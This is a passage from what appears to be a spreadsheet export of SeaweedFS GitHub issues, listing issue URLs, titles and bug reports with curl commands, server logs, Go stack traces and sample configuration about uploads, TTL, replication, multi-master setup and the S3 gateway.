    <t>I've got it running as a server: ./weed server -filer.redirectOnRead -filer Here's the curl. Note the hostname in the Location header: bash-3.2$ curl -vI http://weed1:8888/path/to/sources/README.md &gt; /dev/null &gt; HEAD /path/to/sources/README.md HTTP/1.1 &gt; User-Agent: curl/7.30.0 &gt; Host: weed1:8888 &gt; Accept: _/_ &gt; &gt; &lt; HTTP/1.1 302 Found &gt; &lt; Location: http://localhost:8080/5,01afbd8c36 &gt; &lt; Date: Sat, 20 Dec 2014 17:15:34 GMT &gt; &lt; Content-Type: text/plain; charset=utf-8 &gt; &lt; &gt; 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 &gt; - Connection #0 to host weed1 left intact &gt; bash-3.2$</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/82</t>
  </si>
  <si>
    <t>get content type error</t>
  </si>
  <si>
    <t>hi, I use weed-fs 1 years ago. It is an old version [0.45] of weed. I post an image to weedfs, then I get it from browser , It will display correctly. curl -F file=@/home/chris/myphoto.jpg http://localhost:9333/submit when I use 0.67 of weed. I do the same post, But the same images cannot display in the browser correctly. It cannot display then do download in the chrome. what is wrong about the weed version up? How can I config to this get header output ? please help me.</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/93</t>
  </si>
  <si>
    <t>Lots of "volume_server_handlers.go:75] read error: &lt;nil&gt; /5,1001e1b02c1b01" errors in our production server log files</t>
  </si>
  <si>
    <t>Here is the  Deploy structure  10.252.130.159:9333(master) 10.252.130.159:5088(haproxy) / \ 10.252.133.22:5083 (volume1) 10.252.135.207:5084(volume2) Replication Stratage: 001  So, it always gets the content via haproxy from the volume server. But after running few days, we get a 404 error sometimes from the 10.252.130.159:5088 for a special fid such as :5,1001e1b02c1b01. And we did a check and found that one of volume server(different fid on the random different server) always output the following logs:  I0303 15:44:23 21828 volume_server_handlers.go:75] read error: &lt;nil&gt; /5,1001e1b02c1b01 I0303 15:45:14 21828 volume_server_handlers.go:75] read error: &lt;nil&gt; /5,1001e1b02c1b01 I0303 15:52:52 21828 volume_server_handlers.go:75] read error: &lt;nil&gt; /5,1001e1b02c1b01 I0303 15:52:52 21828 volume_server_handlers.go:75] read error: &lt;nil&gt; /5,1001e1b02c1b01 I0303 15:53:05 21828 volume_server_handlers.go:75] read error: &lt;nil&gt; /5,1001e1b02c1b01 I0303 15:53:06 21828 volume_server_handlers.go:75] read error: &lt;nil&gt; /5,1001e1b02c1b01 I0303 15:53:07 21828 volume_server_handlers.go:75] read error: &lt;nil&gt; /5,1001e1b02c1b01 I0303 15:53:07 21828 volume_server_handlers.go:75] read error: &lt;nil&gt; /5,1001e1b02c1b01 I0303 15:53:18 21828 volume_server_handlers.go:75] read error: &lt;nil&gt; /5,1001e1b02c1b01  It means that the file for [fid:5,1001e1b02c1b01] has be damaged? And how to fix this? How could be happened? any suggestions?</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/166</t>
  </si>
  <si>
    <t>when the former ttl(upload ttl, not assign ttl) expired, same file uploaded without ttl option, but it can't be downloaded</t>
  </si>
  <si>
    <t xml:space="preserve"> # curl -F file=@start_master.sh http://192.168.23.70:18080/xxxx?ttl=1m {"name":"start_master.sh","size":645} // after 1m # curl -i http://192.168.23.70:18080/xxxx HTTP/1.1 404 Not Found Date: Fri, 10 Jul 2015 15:17:47 GMT Content-Length: 0 # curl -F file=@start_master.sh http://192.168.23.70:18080/xxxx {"name":"start_master.sh","size":645} # curl -i http://192.168.23.70:18080/xxxx HTTP/1.1 404 Not Found Date: Fri, 10 Jul 2015 15:18:12 GMT Content-Length: 0  If I uploaded another file, it can be downloaded:  # curl -F file=@start_volume.sh http://192.168.23.70:18080/xxxx {"name":"start_volume.sh","size":411} # curl -i http://192.168.23.70:18080/xxxx HTTP/1.1 200 OK Accept-Ranges: bytes Content-Disposition: filename="start_volume.sh" Content-Length: 411 Content-Type: text/x-sh; charset=utf-8 Etag: "63bdc9b5" Last-Modified: Fri, 10 Jul 2015 15:19:28 GMT Date: Fri, 10 Jul 2015 15:19:31 GMT &lt;&gt;  I think if file unchanged but ttl changed, needle should be written to data file:  golang func (v *Volume) write(n *Needle) (size uint32, err error) { if v.isFileUnchanged(n) { size = n.DataSize glog.V(4).Infof("needle is unchanged!") return } </t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/214</t>
  </si>
  <si>
    <t>seaweedfs should check WhiteList before proxyToLeader</t>
  </si>
  <si>
    <t>` r.HandleFunc("/", ms.uiStatusHandler) r.HandleFunc("/ui/index.html", ms.uiStatusHandler) r.HandleFunc("/dir/assign", ms.proxyToLeader(ms.guard.WhiteList(ms.dirAssignHandler r.HandleFunc("/dir/lookup", ms.proxyToLeader(ms.guard.WhiteList(ms.dirLookupHandler r.HandleFunc("/dir/join", ms.proxyToLeader(ms.guard.WhiteList(ms.dirJoinHandler r.HandleFunc("/dir/status", ms.proxyToLeader(ms.guard.WhiteList(ms.dirStatusHandler r.HandleFunc("/col/delete", ms.proxyToLeader(ms.guard.WhiteList(ms.collectionDeleteHandler r.HandleFunc("/vol/lookup", ms.proxyToLeader(ms.guard.WhiteList(ms.volumeLookupHandler ` If a request not in whitelist is sent to a non-leader master, this request will be handled by leader, which is unexpected.</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/409</t>
  </si>
  <si>
    <t>seaweedfs should support 0-size file uploading and downloading</t>
  </si>
  <si>
    <t xml:space="preserve">Now, 0-size text file can be uploaded and download successfully. But, 0-size jpg file(or other not isGzippable()) can not be uploaded, report `{"name":"empty.doc","error":"Failed to write to local disk"}`. I suggest seaweedfs should support 0-size all format file unploading and downloading, or return `400 bad request` when being uploaded. 0-size text file uploaded successfully:  # curl -F file=@empty.txt 192.168.4.18:28083/45,6c8916e496119e -v * Hostname was NOT found in DNS cache * Trying 192.168.4.18 * Connected to 192.168.4.18 (192.168.4.18) port 28083 (#0) &gt; POST /45,6c8916e496119e HTTP/1.1 &gt; User-Agent: curl/7.35.0 &gt; Host: 192.168.4.18:28083 &gt; Accept: */* &gt; Content-Length: 187 &gt; Expect: 100-continue &gt; Content-Type: multipart/form-data; boundary=bcba47b57757d366 &gt; &lt; HTTP/1.1 100 Continue &lt; HTTP/1.1 201 Created &lt; Content-Type: application/json &lt; Date: Tue, 06 Dec 2016 07:34:49 GMT &lt; Content-Length: 30 &lt; * Connection #0 to host 192.168.4.18 left intact {"name":"empty.txt","size":23}  0-size doc file uploaded unsuccessfully:  # curl -F file=@empty.doc 192.168.4.18:28083/45,6c8916e496119e -v * Hostname was NOT found in DNS cache * Trying 192.168.4.18 * Connected to 192.168.4.18 (192.168.4.18) port 28083 (#0) &gt; POST /45,6c8916e496119e HTTP/1.1 &gt; User-Agent: curl/7.35.0 &gt; Host: 192.168.4.18:28083 &gt; Accept: */* &gt; Content-Length: 201 &gt; Expect: 100-continue &gt; Content-Type: multipart/form-data; boundary=8228c550c48374e5 &gt; &lt; HTTP/1.1 100 Continue &lt; HTTP/1.1 500 Internal Server Error &lt; Content-Type: application/json &lt; Date: Tue, 06 Dec 2016 07:30:34 GMT &lt; Content-Length: 60 * HTTP error before end of send, stop sending &lt; * Closing connection 0 {"name":"empty.doc","error":"Failed to write to local disk"} </t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/524</t>
  </si>
  <si>
    <t>hanged when run weed master</t>
  </si>
  <si>
    <t xml:space="preserve">  tmp git:(master)  weed master -peers 10.64.7.106:9444,10.4.23.114:9444,10.4.23.115:9444 -ip 10.64.7.106 -ip.bind 10.64.7.106 -port 9444 I0703 19:46:40 39010 file_util.go:20] Folder /tmp Permission: -rwxrwxrwx I0703 19:46:40 39010 master_server.go:62] Volume Size Limit is 30000 MB I0703 19:46:40 39010 master.go:87] Start Seaweed Master 0.76 at 10.64.7.106:9444 I0703 19:46:40 39010 raft_server.go:56] Peers Change: [] =&gt; [10.64.7.106:9444 10.4.23.114:9444 10.4.23.115:9444] I0703 19:46:40 39010 raft_server.go:78] Joining cluster: 10.64.7.106:9444,10.4.23.114:9444,10.4.23.115:9444 I0703 19:46:41 39010 raft_server.go:166] Attempting to connect to: http://10.4.23.114:9444/cluster/join  using browser open this url , crashed.  2017/07/03 19:47:13 http: panic serving 10.232.4.175:59240: runtime error: invalid memory address or nil pointer dereference goroutine 55 [running]: net/http.(*conn).serve.func1(0xc4202d6140) /home/jinlei1/os/go/src/net/http/server.go:1721 +0xd0 panic(0xbab320, 0x10782f0) /home/jinlei1/os/go/src/runtime/panic.go:489 +0x2cf github.com/chrislusf/seaweedfs/weed/server.(*MasterServer).uiStatusHandler(0xc4201e2380, 0x1047400, 0xc42030a000, 0xc4202de500) /home/jinlei1/ksyun/src/github.com/chrislusf/seaweedfs/weed/server/master_server_handlers_ui.go:24 +0x13b github.com/chrislusf/seaweedfs/weed/server.(*MasterServer).(github.com/chrislusf/seaweedfs/weed/server.uiStatusHandler)-fm(0x1047400, 0xc42030a000, 0xc4202de500) /home/jinlei1/ksyun/src/github.com/chrislusf/seaweedfs/weed/server/master_server.go:66 +0x48 net/http.HandlerFunc.ServeHTTP(0xc4201c7010, 0x1047400, 0xc42030a000, 0xc4202de500) /home/jinlei1/os/go/src/net/http/server.go:1942 +0x44 github.com/gorilla/mux.(*Router).ServeHTTP(0xc4201ce960, 0x1047400, 0xc42030a000, 0xc4202de500) /home/jinlei1/ksyun/src/github.com/gorilla/mux/mux.go:114 +0x10c net/http.serverHandler.ServeHTTP(0xc4202049a0, 0x1047400, 0xc42030a000, 0xc4202de300) /home/jinlei1/os/go/src/net/http/server.go:2568 +0x92 net/http.(*conn).serve(0xc4202d6140, 0x1047f00, 0xc4202b0340) /home/jinlei1/os/go/src/net/http/server.go:1825 +0x612 created by net/http.(*Server).Serve /home/jinlei1/os/go/src/net/http/server.go:2668 +0x2ce </t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/543</t>
  </si>
  <si>
    <t>benchmark report 404 on /dir/assign</t>
  </si>
  <si>
    <t>Hi, I need some help here. I set up a seaweadfs cluster, which works fine. Passed all my reads/writes tests. But when I run ./weed benchmark command, it reports 100% 404 Not Found on /dir/assign request: ./weed benchmark -server=127.0.0.1:9333 -n=100  Writing Benchmark  writing file error: http://127.0.0.1:9333/dir/assign: 404 Not Found writing file error: http://127.0.0.1:9333/dir/assign: 404 Not Found 98 more of this I tested http://127.0.0.1:9333/dir/assign with both curl and browser, it works well: curl http://127.0.0.1:9333/dir/assign {"fid":"9,07a4983afa","url":"someurl:8080","publicUrl":"someurl:18080","count":1} I use version 0.76, linux_arm64.tar.gz my machine runs on Centos7, kernel 4.4.36-1.el7.elrepo.x86_64 thanks in advance</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/568</t>
  </si>
  <si>
    <t>Multi master server setup failure</t>
  </si>
  <si>
    <t>Hi, Chirslusf. I have encountered a problem when setting up a multi master server cluster according the wiki. I have 3 vm:  vm1: 10.100.35.21 vm2: 10.100.35.20 vm3: 10.100.35.22  I start weed master server one by one in below order:  vm1: ./weed master -ip 10.100.35.21 -port=9333 -mdir=./master vm2: ./weed master -ip 10.100.35.20 -port=9333 -mdir=./master -peers=10.100.35.21:9333 vm3: ./weed master -ip 10.100.35.22 -port=9333 -mdir=./master -peers=10.100.35.20:9333  And then we can see the log output of each start:  vm1: # ./weed master -ip 10.100.35.21 -port=9333 -mdir=./master I0927 15:13:02 14610 file_util.go:20] Folder ./master Permission: -rwxr-xr-x I0927 15:13:02 14610 master_server.go:62] Volume Size Limit is 30000 MB I0927 15:13:02 14610 master.go:87] Start Seaweed Master 0.76 at 0.0.0.0:9333 I0927 15:13:02 14610 raft_server.go:56] Peers Change: [10.100.35.21:9333] =&gt; [] I0927 15:13:02 14610 raft_server.go:98] Initializing new cluster I0927 15:13:02 14610 master_server.go:95] [ 10.100.35.21:9333 ] I am the leader! I0927 15:13:12 14610 raft_server_handlers.go:16] Processing incoming join. Current Leader 10.100.35.21:9333 Self 10.100.35.21:9333 Peers map[] I0927 15:13:12 14610 raft_server_handlers.go:20] Command:{"name":"10.100.35.20:9333","connectionString":"http://10.100.35.20:9333"} I0927 15:13:12 14610 raft_server_handlers.go:27] join command from Name 10.100.35.20:9333 Connection http://10.100.35.20:9333 vm2: # ./weed master -ip 10.100.35.20 -port=9333 -mdir=./master -peers=10.100.35.21:9333 I0927 15:13:11 3117 file_util.go:20] Folder ./master Permission: -rwxr-xr-x I0927 15:13:11 3117 master_server.go:62] Volume Size Limit is 30000 MB I0927 15:13:11 3117 master.go:87] Start Seaweed Master 0.76 at 0.0.0.0:9333 I0927 15:13:11 3117 raft_server.go:56] Peers Change: [10.100.35.20:9333] =&gt; [10.100.35.21:9333] I0927 15:13:11 3117 raft_server.go:78] Joining cluster: 10.100.35.21:9333 I0927 15:13:12 3117 raft_server.go:166] Attempting to connect to: http://10.100.35.21:9333/cluster/join I0927 15:13:12 3117 raft_server.go:211] Post returned status: 200 I0927 15:13:52 3117 raft_server_handlers.go:16] Processing incoming join. Current Leader 10.100.35.21:9333 Self 10.100.35.20:9333 Peers map[10.100.35.21:9333:0xc42021fa40] I0927 15:13:52 3117 raft_server_handlers.go:20] Command:{"name":"10.100.35.22:9333","connectionString":"http://10.100.35.22:9333"} I0927 15:13:52 3117 raft_server_handlers.go:27] join command from Name 10.100.35.22:9333 Connection http://10.100.35.22:9333 I0927 15:13:52 3117 raft_server_handlers.go:47] Redirecting to 301 http://10.100.35.21:9333/cluster/join vm3: # ./weed master -ip 10.100.35.22 -port=9333 -mdir=./master -peers=10.100.35.20:9333 I0927 15:13:51 2964 file_util.go:20] Folder ./master Permission: -rwxr-xr-x I0927 15:13:51 2964 master_server.go:62] Volume Size Limit is 30000 MB I0927 15:13:51 2964 master.go:87] Start Seaweed Master 0.76 at 0.0.0.0:9333 I0927 15:13:51 2964 raft_server.go:56] Peers Change: [] =&gt; [10.100.35.20:9333] I0927 15:13:51 2964 raft_server.go:78] Joining cluster: 10.100.35.20:9333 I0927 15:13:52 2964 raft_server.go:166] Attempting to connect to: http://10.100.35.20:9333/cluster/join I0927 15:13:52 2964 raft_server.go:211] Post returned status: 404 404 page not found I0927 15:13:52 2964 raft_server.go:171] Post returned error: 404 page not found I0927 15:13:52 2964 raft_server.go:82] No existing server found. Starting as leader in the new cluster. I0927 15:13:52 2964 master_server.go:95] [ 10.100.35.22:9333 ] I am the leader!  It seems that the weed master on vm3 did not handle the 301 redirect to connect to the master(current leader) on vm1. Is this a bug? looking forward to your reply. 3ks.</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/814</t>
  </si>
  <si>
    <t>Seaweedfs client core dump when calling DeleteFiles</t>
  </si>
  <si>
    <t>Sponsors SeaweedFS via Patreon https://www.patreon.com/seaweedfs **Describe the bug** When seaweedfs client calls DeleteFiles (e.g. fileId=123,xxx, volume 123 not exist), it ALWAYS crashes. **Screenshots** goroutine 89 [running]: github.com/chrislusf/seaweedfs/weed/operation.DeleteFilesWithLookupVolumeId(0xc42061d578, 0x1, 0x1, 0xc4206a4160, 0x20, 0x20, 0xc4206a4140, 0x7fbfd979d1e0, 0x0) github.com/chrislusf/seaweedfs/weed/operation/delete_content.go:74 +0xce9 github.com/chrislusf/seaweedfs/weed/operation.DeleteFiles(0xc420286090, 0xe, 0xc42061d578, 0x1, 0x1, 0xc42061d538, 0x4126c8, 0x20, 0x9b9ca0, 0x725201) github.com/chrislusf/seaweedfs/weed/operation/delete_content.go:36 +0x8a</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/861</t>
  </si>
  <si>
    <t>TTL marshal result is empty influencing /vol/status api result</t>
  </si>
  <si>
    <t xml:space="preserve">Sponsors SeaweedFS via Patreon https://www.patreon.com/seaweedfs **Describe the bug** because TTL's members are invisible out of package, so when json.Marshal is called, all the TTL info are empty, which influences the /vol/status api golang type TTL struct { count byte unit byte } </t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/913</t>
  </si>
  <si>
    <t>allocating all available volumes fails</t>
  </si>
  <si>
    <t>Sponsors SeaweedFS via Patreon https://www.patreon.com/seaweedfs **Describe the bug** I tried to allocate all available volumes (which was 6,400 volumes) and it allocated all but 42 of the volumes and then threw an error (then I was able to allocate the last 42 volumes successfully)  $ curl "http://seaweed-master:9333/vol/grow?collection=test&amp;count=6400" {"error":"Failed to assign 6625: rpc error: code = Unknown desc = No more free space left"} $ curl "http://seaweed-master:9333/vol/grow?collection=test&amp;count=6400" {"error":"Only 42 volumes left! Not enough for 6400"} $ curl "http://seaweed-master:9333/vol/grow?collection=test&amp;count=42" {"count":42}  (sorry, didn't get screen shots) after deleting all volumes and running again, I got got a different error and strangely I see 6,400 volumes allocated but it says 397 volumes free (which should be 0 volumes free)  $ curl "http://seaweed-master:9333/vol/grow?collection=test&amp;count=6400" {"error":"Failed to assign 6669: rpc error: code = Unavailable desc = all SubConns are in TransientFailure, latest connection error: connection error: desc = \"transport: Error while dialing dial tcp 192.168.X.XXX:18080: connect: connection refused\""}  and strangely it say 397 volumes are free ![image](https://user-images.githubusercontent.com/4112046/55459751-1b730b80-55a5-11e9-9bd8-7121623f067b.png) even though the volume servers show a total of 6400 volumes ![image](https://user-images.githubusercontent.com/4112046/55459802-3c3b6100-55a5-11e9-9249-359442fc9d19.png) **System Setup** `master` `filer` and `s3` on one machine and `volume` on 4 separate machines **Expected behavior** allocating all available volumes should succeed and counts should make sense **Screenshots** n/a **Additional context** n/a</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/1036</t>
  </si>
  <si>
    <t>Update existing file fails - Even possible?</t>
  </si>
  <si>
    <t>**Describe the bug** I want to perform updates to existing files by uploading the data to the already existing fid. The first upload works, but then all following updates will fail with an HTTP error: **System Setup** Running version 1.4.2 on Linux64 ./weed master -mdir="master01" -defaultReplication=002 ./weed volume -port=8081 -mserver="localhost:9333" -dir="volume01" -max=100 ./weed volume -port=8082 -mserver="localhost:9333" -dir="volume02" -max=100 ./weed volume -port=8083 -mserver="localhost:9333" -dir="volume03" -max=100 **Expected behavior** I would expect that the file upload works like the first with this file. But maybe I'm wrong and the update of an existing file is not possible. An other way would be to assign a new file id for every update and to delete the old. **Sequence** _Client:_ curl -F file=myFile http://127.0.0.1:8083/3,02b3f5780c Response: `{"size":8,"error":"failed to write to replicas for volume 3: [127.0.0.1:8081]: unexpected end of JSON input\n[127.0.0.1:8082]: unexpected end of JSON input","eTag":"0ca153a6"}` _Master:_ No related console output _volume01:_ `I0809 23:03:11 11674 common.go:73] error writing JSON {Name: Size:8 Error: ETag:0ca153a6} status 304: http: req` _volume02:_ `I0809 23:03:11 11704 common.go:73] error writing JSON {Name: Size:8 Error: ETag:0ca153a6} status 304: http: request method or response status code does not allow body` _volume03:_  I0809 23:03:11 11688 upload_content.go:136] failing to read upload response http://127.0.0.1:8081/3,02b3f5780c?ts=1565384591&amp;ttl=&amp;type=replicate I0809 23:03:11 11688 upload_content.go:136] failing to read upload response http://127.0.0.1:8082/3,02b3f5780c?ts=1565384591&amp;ttl=&amp;type=replicate  Thank you!</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/1064</t>
  </si>
  <si>
    <t>seaweed s3 list_buckets</t>
  </si>
  <si>
    <t>Sponsors SeaweedFS via Patreon https://www.patreon.com/seaweedfs **Describe the bug** I'm using s3 gateway and python boto3 and while trying to list all buckets I'm getting the error:   kwrgs = {'endpoint_url': 'http://seaweedfs-s3.default.svc.cluster.local:8333', 'aws_access_key_id': 'accessKey1', 'aws_secret_access_key': 'secretKey1'}  import boto3  cli = boto3.client('s3', **kwrgs)  cli.list_buckets() Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; File "/usr/local/lib/python3.7/site-packages/botocore/client.py", line 357, in _api_call return self._make_api_call(operation_name, kwargs) File "/usr/local/lib/python3.7/site-packages/botocore/client.py", line 661, in _make_api_call raise error_class(parsed_response, operation_name) botocore.exceptions.ClientError: An error occurred (InternalError) when calling the ListBuckets operation (reached max retries: 4): We encountered an internal error, please try again.  I Found only Errors in the s3 gateway:  I0916 09:49:36 1 config.go:25] Reading security.toml from I0916 09:49:36 1 config.go:28] Reading : Config File "security" Not Found in "[/ /root/.seaweedfs /etc/seaweedfs]" I0916 09:49:36 1 s3.go:92] Start Seaweed S3 API Server 30GB 1.43 at http port 8333 I0916 09:50:58 1 filer_util.go:89] read directory: directory:"/buckets" limit:2147483647 I0916 09:51:18 1 s3api_handlers.go:78] status 500 application/xml: &lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;Error&gt;&lt;Code&gt;InternalError&lt;/Code&gt;&lt;Message&gt;We encountered an internal error, please try again.&lt;/Message&gt;&lt;Resource&gt;/&lt;/Resource&gt;&lt;RequestId&gt;1568627478252701334&lt;/RequestId&gt;&lt;/Error&gt; I0916 09:51:19 1 filer_util.go:89] read directory: directory:"/buckets" limit:2147483647 I0916 09:51:39 1 s3api_handlers.go:78] status 500 application/xml: &lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;Error&gt;&lt;Code&gt;InternalError&lt;/Code&gt;&lt;Message&gt;We encountered an internal error, please try again.&lt;/Message&gt;&lt;Resource&gt;/&lt;/Resource&gt;&lt;RequestId&gt;1568627499203098406&lt;/RequestId&gt;&lt;/Error&gt; I0916 09:51:40 1 filer_util.go:89] read directory: directory:"/buckets" limit:2147483647 I0916 09:52:00 1 s3api_handlers.go:78] status 500 application/xml: &lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;Error&gt;&lt;Code&gt;InternalError&lt;/Code&gt;&lt;Message&gt;We encountered an internal error, please try again.&lt;/Message&gt;&lt;Resource&gt;/&lt;/Resource&gt;&lt;RequestId&gt;1568627520693419381&lt;/RequestId&gt;&lt;/Error&gt; I0916 09:52:02 1 filer_util.go:89] read directory: directory:"/buckets" limit:2147483647 I0916 09:52:22 1 s3api_handlers.go:78] status 500 application/xml: &lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;Error&gt;&lt;Code&gt;InternalError&lt;/Code&gt;&lt;Message&gt;We encountered an internal error, please try again.&lt;/Message&gt;&lt;Resource&gt;/&lt;/Resource&gt;&lt;RequestId&gt;1568627542703114894&lt;/RequestId&gt;&lt;/Error&gt; I0916 09:52:30 1 filer_util.go:89] read directory: directory:"/buckets" limit:2147483647 I0916 09:52:50 1 s3api_handlers.go:78] status 500 application/xml: &lt;?xml version="1.0" encoding="UTF-8"?&gt; &lt;Error&gt;&lt;Code&gt;InternalError&lt;/Code&gt;&lt;Message&gt;We encountered an internal error, please try again.&lt;/Message&gt;&lt;Resource&gt;/&lt;/Resource&gt;&lt;RequestId&gt;1568627570429772055&lt;/RequestId&gt;&lt;/Error  FYI : The weed shell can return the colletion.list and fs.tree without any issue The s3cmd can't list buckets too put file is working: cli.put_object(Bucket='test', Key='test', Body='test'). output:  {'ResponseMetadata': {'RequestId': '1568620869872887033', 'HostId': '', 'HTTPStatusCode': 200, 'HTTPHeaders': {'accept-ranges': 'bytes', 'etag': '"098f6bcd4621d373cade4e832627b4f6"', 'x-amz-request-id': '1568620869872887033', 'date': 'Mon, 16 Sep 2019 08:01:09 GMT', 'content-length': '0'}, 'RetryAttempts': 0}, 'ETag': '"098f6bcd4621d373cade4e832627b4f6"'}  **System Setup** - List the command line to start "weed master", "weed volume", "weed filer", "weed s3", "weed mount":  /usr/bin/weed -v=4 s3 -port=8333 -filer.dir.buckets=/buckets -filer=seaweedfs-filer.default:8888 /usr/bin/weed -v=4 master -port=9333 -mdir=/data -ip.bind=0.0.0.0 -volumeSizeLimitMB=30000 -defaultReplication=000 -ip=seaweedfs-master-0.seaweedfs-master -peers=seaweedfs-master-0.seaweedfs-master:9333 /usr/bin/weed -v=4 volume -port=8080 -dir=/data -max=1000 -ip.bind=0.0.0.0 -read.redirect=true -ip=10.244.83.158 -mserver=seaweedfs-master-0.seaweedfs-master:9333 /usr/bin/weed -v=4 filer -port=8888 -dirListLimit=100000 -ip=10.244.83.155 -master=seaweedfs-master-0.seaweedfs-master:9333  - OS version: Ubuntu 18.04.2 LTS - output of `weed version`: version 30GB 1.43 linux amd64 - if using filer, show the content of `filer.toml`  # A sample TOML config file for SeaweedFS filer store # Used with "weed filer" or "weed server -filer" [memory] # local in memory, mostly for testing purpose enabled = false [leveldb] # local on disk, mostly for simple single-machine setup, fairly scalable enabled = false dir = "/data" # directory to store level db files [leveldb2] # local on disk, mostly for simple single-machine setup, fairly scalable enabled = true dir = "/data/filerldb2" # directory to store level db 2 files  # multiple filers on shared storage, fairly scalable  [mysql] # CREATE TABLE IF NOT EXISTS filemeta ( # dirhash BIGINT COMMENT 'first 64 bits of MD5 hash value of directory field', # name VARCHAR(1000) COMMENT 'directory or file name', # directory TEXT COMMENT 'full path to parent directory', # meta BLOB, # PRIMARY KEY (dirhash, name) # ) DEFAULT CHARSET=utf8; enabled = false hostname = "localhost" port = 3306 username = "root" password = "" database = "" # create or use an existing database connection_max_idle = 2 connection_max_open = 100 [postgres] # CREATE TABLE IF NOT EXISTS filemeta ( # dirhash BIGINT, # name VARCHAR(65535), # directory VARCHAR(65535), # meta bytea, # PRIMARY KEY (dirhash, name) # ); enabled = false hostname = "localhost" port = 5432 username = "postgres" password = "" database = "" # create or use an existing database sslmode = "disable" connection_max_idle = 100 connection_max_open = 100 [cassandra] # CREATE TABLE filemeta ( # directory varchar, # name varchar, # meta blob, # PRIMARY KEY (directory, name) # ) WITH CLUSTERING ORDER BY (name ASC); enabled = false keyspace="seaweedfs" hosts=[ "localhost:9042", ] [redis] enabled = false address = "localhost:6379" password = "" db = 0 [redis_cluster] enabled = false addresses = [ "localhost:30001", "localhost:30002", "localhost:30003", "localhost:30004", "localhost:30005", "localhost:30006", ]  **Expected behavior** List all buckets when has only 1 bucket using python boto3</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/1160</t>
  </si>
  <si>
    <t>Deleting a non-existing file returns a 500 internal server error</t>
  </si>
  <si>
    <t>I'm testing a seaweedfs setup with a cassandra filer. When I try to delete a non-existing resource, the filer API returns a 500 error code. I would expect a 404.</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/1161</t>
  </si>
  <si>
    <t>How do I create an empty directory?</t>
  </si>
  <si>
    <t>This is what I tried: curl -X PUT "http://localhost:8888/test/" =&gt; {"error":"can not to write to folder /test/ without a file name"} curl -X POST "http://localhost:8888/test/" =&gt; {"error":"request Content-Type isn't multipart/form-data"} curl -X PUT "http://localhost:8888/test" =&gt; creates a 0 byte file curl -X POST "http://localhost:8888/test" =&gt; {"error":"request Content-Type isn't multipart/form-data"}</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/1239</t>
  </si>
  <si>
    <t>filler does not pass query params to volume server</t>
  </si>
  <si>
    <t>Sponsors SeaweedFS via Patreon https://www.patreon.com/seaweedfs **Describe the bug** requests to filer like http://172.18.0.18:8888/test/1.jpg?width=200 didnt resize image it looks like something was broken in version 1.59 (1.58 works as expected) **System Setup** version 30GB 1.64 linux amd64</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/1436</t>
  </si>
  <si>
    <t>Volume not found, but it actually exists.</t>
  </si>
  <si>
    <t>Version: 1.91 There are times that filer return 500 when downloading file. And the error said "volume 603 not found". But it actually exists on volume server. Ant when I restart the filer. It will be correct. ![image](https://user-images.githubusercontent.com/11285030/91559504-ca6a7100-e96a-11ea-8ecf-384f7f7cd148.png) ![image](https://user-images.githubusercontent.com/11285030/91559548-dfdf9b00-e96a-11ea-9f41-b85dd81a1a71.png) I didn't open the verbose log on that case. I'm still checking stack trace. I will paste more information here next time it happened</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/1722</t>
  </si>
  <si>
    <t>s3 gateway ListObjects does not support arbitrary prefix</t>
  </si>
  <si>
    <t>**Describe the bug** The S3 gateway of seaweedfs does not support listing objects with arbitrary prefix. **System Setup** - filer leveldb2 backend, seaweedfs master **Expected behavior** Calling `GET` on `http://seaweedfs_s3_gw/bucket/?prefix=arbitrary_prefix` should always return files whose path starts with `arbitrary_prefix`, no matter whether `arbitrary_prefix` is an actual directory or not. **Actual behavior** Calling `GET` on `http://seaweedfs_s3_gw/bucket/?prefix=arbitrary_prefix` returns every single object in the bucket regardless of their prefix if `arbitrary_prefix` is not a folder inside `bucket`. **Additional context** After a bit of digging around myself, it seems that this issue is actually two issues (both of which are about : 1. The `namePattern` parameter passed to `ListDirectoryEntries` in `weed/filer/filer_search.go` should contain a wildcard character `*` at the end of the prefix (i.e. `prefix*`, not `prefix`); this is what caused the list request to return every single file 2. ~~(After making the change above) the `ListDirectoryPrefixedEntries` (at least in the leveldb2 backend) does not seem to work properly (I cannot figure out why yet because I don't really understand the filer store design). In my case, it simply does not return any entry if the prefix should match more than one files. I think it is related to the latest commit that implements hash-prefix-based searching in leveldb / leveldb2.~~ I think https://github.com/chrislusf/seaweedfs/blob/master/weed/filer/leveldb2/leveldb2_store.go#L188 needs to be `continue` instead of `break` Some programs expect ListObjects to be able to list files with arbitrary prefix (such as `s3ql`) and will error if this does not work. Most other S3 implementations, including the official S3 service, support this correctly.</t>
  </si>
  <si>
    <t>https://github.com/seaweedfs/seaweedfs/issues/1724</t>
  </si>
  <si>
    <t>One of the two volume servers that contain data returns error: invalid character '\x1f' and MIME type error</t>
  </si>
  <si>
